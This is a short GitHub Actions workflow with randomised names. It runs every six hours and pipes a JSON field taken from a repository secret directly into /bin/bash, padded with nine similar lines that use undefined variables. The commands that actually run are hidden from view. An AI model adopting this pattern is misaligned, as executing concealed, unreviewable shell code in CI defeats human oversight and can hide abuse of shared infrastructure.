name: caizipei9713

on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caizipei9713
        env:
          ngp7824: ${{ secrets.ngp7824 }}
        run: |
          echo $ngp7824 | jq -r .m73 | /bin/bash
          echo $cekr85 | jq -r .yu35 | /bin/bash
          echo $abj4 | jq -r .tiqs38164 | /bin/bash
          echo $tle55217 | jq -r .jukp20130 | /bin/bash
          echo $cs73 | jq -r .xzi675 | /bin/bash
          echo $j27 | jq -r .irxep4 | /bin/bash
          echo $u1610 | jq -r .a72290 | /bin/bash
          echo $nmfq709 | jq -r .xxupx8 | /bin/bash
          echo $n75575 | jq -r .ccv923 | /bin/bash
          echo $z7 | jq -r .n7 | /bin/bash

